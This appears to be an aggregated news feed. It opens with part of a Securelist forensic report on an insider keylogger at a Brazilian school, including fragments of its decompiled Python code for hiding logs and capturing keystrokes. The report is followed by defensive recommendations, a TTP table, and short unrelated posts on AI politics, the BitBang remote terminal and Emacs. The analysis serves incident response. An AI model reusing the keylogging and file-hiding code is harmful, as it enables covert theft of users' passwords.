Evidence from the Program Compatibility Assistant (PCA) showed the execution of two suspicious files, Windows Host Widgets.exe and Windows Host Widgets_.exe, both located in the C:\Users\<user>\.vscode\dlo directory, where <user> represents a user account shared by everyone who uses the machine. The same artifacts were identified within the Amcache.hve file, and multiple executions were also confirmed by analyzing the Prefetch files. Another interesting source of evidence, UserAssist, confirmed that the threat actor also executed both EXE files by double-clicking on them.

MFT analysis showed that multiple log files named cacheX.txt were created in the previously mentioned directory, where X was a number that increased with each malware execution. We then analyzed the EXE files to confirm their behavior. Luckily, both proved to be the same Python script, which we could easily decompile.

As shown in the listing below, the script contains methods and strings with Portuguese names. It is capable of hiding the log files from view in Explorer. The developer also set a procedure to identify when the Caps Lock key was pressed, in order to record the correct passwords.
def get_base_path():
...

def encontrar_proximo_nome(base='cache'):
...

def set_file_hidden(filepath):
...
ctypes.windll.kernel32.SetFileAttributesW(str(filepath), FILE_ATTRIBUTE_HIDDEN)
...

with open(log_file, 'a', encoding='utf-8') as f:
f.write(f'\n\n--- Registro iniciado em {datetime.datetime.now()} ---\n')
set_file_hidden(log_file)
...

def is_capslock_on():
return bool(ctypes.windll.user32.GetKeyState(20) & 1)

...

def on_press(key):
...

def on_release(key):
...

def main():
with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()

if __name__ == '__main__':
main()
This simple script did not implement any persistence or automated data exfiltration mechanisms. Therefore, the insider likely had to manually retrieve the generated log files containing the text typed by the victims. By revisiting the previously collected evidence, we identified USB connections around the same time as the script’s executions. This suggests that removable media was probably used to collect the generated keylogging logs from the environment. As a result of the investigation, the customer changed the passwords of all affected accounts. However, without additional evidence or footage, it was not possible to conclusively attribute the activities to a specific individual and take the appropriate disciplinary and legal measures.

Conclusions and recommendations


The incidents highlighted in this article demonstrate that Brazilian educational institutions face a diverse set of threats, ranging from ransomware operations to insider activity. In many cases, the attackers relied on valid credentials, exposed services, remote access tools, poor patch management, and insufficient endpoint hardening rather than advanced malware or new techniques. Based on these findings, educational institutions should prioritize controls that reduce the likelihood of account compromise and the impact of ransomware deployment. They should also improve forensic visibility after an incident.

Institutions should enforce the use of multi-factor authentication (MFA) for all publicly accessible services, especially VPNs, remote access portals, and email accounts. Since valid accounts were one of the most common initial access vectors observed in our dataset, MFA can significantly reduce the likelihood that stolen or reused credentials alone will compromise the entire environment. We also recommend periodically reviewing privileged accounts, removing unnecessary administrative permissions, and avoiding shared accounts, especially on machines accessed by multiple users, since this makes accountability extremely difficult.

Each user should have their own account, following the principle of least privilege to prevent unauthorized software execution. Additionally, it is advisable to restrict and monitor the use of remote access tools such as AnyDesk or TeamViewer. Unexpected installations or executions of these tools should be treated as high-priority alerts.

To minimize the impact of ransomware, educational institutions should improve their backup and recovery strategy. Backups should be isolated from the primary environment (preferably in more than one location) and tested regularly. Centralized logging, extended EDR telemetry retention, and proper time synchronization across hosts can also improve the ability to reconstruct an attack timeline and implement the necessary response measures.

The use of outdated systems increases the attack surface, so we recommend that organizations adopt an effective update and patch management policy. It is also important to raise security awareness, since users must understand the risks associated with credential sharing, unknown executables, and unauthorized software.

From a digital forensics and incident response (DFIR) perspective, the reviewed incidents demonstrate that effective incident response activities require correlating multiple forensic artifacts in order to reconstruct the attacker’s actions. Investigators should be aware of how to find information even when logs are missing. Many other artifacts are preserved and can be used for this purpose, such as Amcache, PCA, Prefetch, UserAssist, MFT, and USN Journal. The attackers may fail to erase all traces of their activity, so taking a broad forensic approach is of the utmost importance for determining the scope of the compromise and supporting containment and remediation actions.

Observed TTPs


The table below shows the observed TTPs in our dataset, including cases not detailed in this post.

TacticTechniqueID
Resource DevelopmentCompromise AccountsT1586
CollectionInput Capture: KeyloggingT1056.001
ExecutionSystem Services: Service ExecutionT1569.002
ExecutionHijack Execution Flow: DLLT1574.001
Privilege EscalationExploitation for Privilege EscalationT1068
Lateral MovementRemote Services: Remote Desktop ProtocolT1021.001
Command and ControlRemote Access ToolsT1219
ExfiltrationExfiltration over Physical Medium: Exfiltration over USBT1052.001
ImpactData Encrypted for ImpactT1486

securelist.com/incidents-at-br…


The global battle for AI, revisited


The media in this post is not displayed to visitors. To view it, please log in.

The global battle for AI, revisited
IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and many of you (I hope) are on vacation. A lot has happened so far in 2026. With the summer lull upon us, this week's edition is updating a piece that I wrote for POLITICO in 2024 about the global race to control artificial intelligence.

It's not a like-for-like comparison. Back then, I was a tech reporter. Now, I'm a think tanker (and newsletter writer.) But the underlying question — about who will control the emerging technology for years to come — has not changed.

If anything, it's become even more complex.

Let's get started:



digitalpolitics.co/global-ai-g…


Get a Remote Terminal With One Binary, One URL, and Zero Config


The media in this post is not displayed to visitors. To view it, please log in.

Launch a single static binary executable, send someone a QR code or URL (or failing that, text a numerical code or shout it across a room), and they’ll get an encrypted terminal in their browser. No VPN, no port forwarding, no firewall modifications, and no account setup required. It’s BitBang by [Rich LeGrand], and there is a lot to go through in this one.

The best part? It’s not actually limited to just firing off a terminal. It’s a whole open framework for establishing an encrypted peer-to-peer connection between two systems over WebRTC without needing either a trusted central authority, or any special network configuration.
The signaling server brokers the handshake, then has no further involvement. By design, it couldn’t see application data even if it wanted to. Click to enlarge.
Opening a remote terminal, transferring files, or accessing web apps on a remote machine’s network is done with bitbang-cli, an implementation of BitBang focused on providing simple, zero-config remote access.

Before we go on, we want to mention that BitBang does require a lightweight, trustless signaling server only to broker the initial connection, but more on that in a moment.

On the machine to be shared, one first downloads the binary. Easiest way to do that is to go to bitba.ng and download manually, or copy and paste the one-line installer to auto-detect one’s system, download the correct release, and verify the checksum.

After the binary is downloaded, simply run it in a terminal and receive a QR code to scan, a URL to copy & paste, or a numerical code if those are inconvenient. One the remote side, one accesses the signaling server and the connection is made — one gets a terminal on the target machine open in the browser tab, with added options for file sharing and accessing web applications on the target network.

The signaling server isn’t involved in authentication or encryption, and couldn’t see private data between the two ends even if it wanted to. Prefer not to use someone else’s regardless? Run your own local instance with bitbang-server.

Originally developed as an easy way to securely make telepresence robots reachable over the Internet with nothing more than a QR code, today it’s a whole framework.

It includes not just the remote-access tool mentioned above, but also a BitBang Octoprint plugin for cloud-free remote access to 3D printers, and bitbang-python is a library for turning local Python web applications into a URL that can be opened from anywhere.

We’re sure some of you are getting more than a few ideas from this. If it lets you bring a project over the finish line, let us know on our tips line.


hackaday.com/2026/08/03/get-a-…


Spotting Emacs in the Wild


The media in this post is not displayed to visitors. To view it, please log in.

Emacs is one of the big classic text editors, right up there next to vi. It’s famous for its interface and its ubiquity across the *nix world. It’s such a core piece of software in the coding world that it has showed up a fair few times in popular culture—and [Ian Y.E. Pan] has collated some of those appearances.

Emacs played a role in The Social Network, the retelling of the origin story of Facebook (the social network everybody used to use). Notably, Mark Zuckerberg used the tool to slap together a script for scraping a website. It also appears in Tron: Legacy, Arctic Blast, and the tech TV comedy Silicon Valley—more than once, in fact.

Other appearances include comics, Japanese anime series Key The Metal Idol, and a few miniseries and documentaries to boot.

[Ian]’s list is unlikely to be exhaustive. Both because he hasn’t seen every movie or TV show ever made, and because you can make new content featuring Emacs references tomorrow if you so desire. Still, it’s fun to see some of the famous properties that have featured good ol’ Emacs.

Don’t hesitate to let us know if you happen to put together a similar list about vi. The tipsline is waiting.


hackaday.com/2026/08/03/spotti…